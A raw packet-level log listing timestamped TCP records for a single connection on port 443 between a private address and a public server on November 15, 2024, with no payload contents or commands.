Nov 15, 2024 18:14:15.790865898 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.790934086 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.790945053 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.791028976 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.791100979 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.791111946 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.791655064 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.791727066 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.791738033 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.791857958 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.791934967 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.791945934 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.792001963 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.792067051 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.792078972 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.792125940 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.792190075 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.792201996 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.797192097 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.797266960 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.797280073 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.803901911 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.803994894 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.804007053 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.804858923 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.804936886 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.804948092 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.805051088 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.805125952 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.805138111 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.805819988 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.805896997 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.805915117 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.805969954 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.806030035 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.806049109 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.817039967 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.817110062 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.817116022 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.817574978 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.817635059 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.817639112 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.818105936 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.818166018 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.818171024 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.818553925 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.818614006 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.818619013 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.840955019 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.841061115 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.841072083 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.845057011 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.845122099 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.845128059 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.845341921 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.845401049 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.845405102 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.846658945 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.846725941 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.846729994 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.847341061 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.847400904 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.847404957 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.847790003 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.847851038 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.847855091 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.860810041 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.860878944 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.860882998 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.861558914 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.861613035 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.861618042 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.862149954 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.862210989 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.862215042 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.863300085 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.863362074 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.863367081 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.883987904 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.884059906 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.884082079 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.887981892 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.888047934 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.888067007 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.888171911 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.888242960 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.888247967 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.889786005 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.889849901 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.889854908 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.908879042 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.908957958 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.908963919 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.909167051 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.909224987 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.909229994 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.909297943 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.909353018 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.909363031 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.909457922 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.909518003 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.909522057 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.909682035 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.909739971 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.909744024 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.909821033 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.909876108 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.909879923 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.927110910 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.927176952 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.927189112 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.932282925 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.932348967 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.932354927 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.932480097 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.932533979 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.932538986 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.938823938 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.938886881 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.938893080 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.939021111 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.939100981 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.939105034 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.939332008 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.939394951 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.939399958 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.946574926 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.946638107 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.946644068 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.947805882 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.947868109 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.947874069 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.948837042 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.948894978 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.948900938 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.949245930 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.949301004 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.949305058 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.970252037 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.970351934 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.970374107 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.970958948 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.971050024 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.971055984 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.974630117 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.974689960 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.974694014 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.975882053 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.975943089 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.975948095 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.977300882 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.977364063 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.977368116 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.977556944 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.977616072 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.977621078 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.977701902 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.977756977 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.977761030 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.990767002 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.990839005 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.990844011 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.992405891 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.992466927 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.992474079 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.992624044 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.992692947 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.992697954 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.013499975 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.013591051 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.013756037 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.013756037 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.013773918 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.017261028 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.017339945 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.017353058 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.017739058 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.017806053 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.017817020 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.019629002 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.019697905 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.019710064 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.019954920 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.020023108 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.020035028 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.020232916 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.020303011 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.020313978 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.033634901 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.033711910 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.033724070 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.034302950 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.034466028 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.034476995 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.035665035 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.035734892 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.035748005 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.055567026 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.055772066 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.055783987 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.055943012 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.056010962 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.056021929 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.060276031 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.060364008 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.060375929 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.060791969 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.060857058 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.060869932 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.061858892 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.061923981 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.061935902 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.062886000 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.062952995 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.062966108 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.063585997 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.063657045 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.063668966 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.076452971 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.076544046 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.076562881 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.076940060 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.077102900 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.077115059 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.078351974 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.078422070 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.078433990 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.078600883 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.078661919 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.078672886 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.100097895 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.100207090 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.100220919 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.102876902 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.102953911 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.102965117 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.103351116 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.103423119 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.103435040 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.104365110 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.104435921 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.104446888 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.105469942 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.105568886 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.105580091 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.105768919 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.105842113 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.105853081 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.118659019 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.118829966 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.118841887 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.119770050 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.119852066 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.119863987 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.121130943 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.121206045 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.121218920 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.121330023 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.121407986 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.121418953 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.143309116 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.143413067 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.143459082 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.143479109 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.143618107 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.146146059 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.146231890 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.146244049 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.146845102 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.146917105 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.146928072 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.148168087 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.148248911 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.148260117 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.148485899 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.148607016 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.148618937 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.148921013 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.149007082 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.149019003 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.163127899 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.163273096 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.163285017 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.163995981 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.164233923 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.164246082 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.164266109 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.164355993 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.164366007 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.185489893 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.185630083 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.185642958 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.185683012 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.185848951 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.185859919 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.188935995 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.189007998 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.189018965 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.189997911 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.190124035 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.190135002 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.190709114 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.190782070 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.190793991 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.191992044 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.192084074 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.192095041 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.192322016 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.192413092 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.192424059 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.206042051 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.206130028 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.206140995 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.207067013 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.207139969 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.207151890 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.207631111 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.207703114 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.207714081 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.207799911 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.207865953 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.207875967 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.228465080 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.228617907 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.228630066 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.231945038 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.232042074 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.232053995 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.232114077 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.232182026 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.232193947 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.233128071 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.233212948 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.233223915 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.234720945 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.234802008 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.234812975 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.235003948 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.235078096 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.235090017 CET	443	49705	142.215.209.78	192.168.2.5
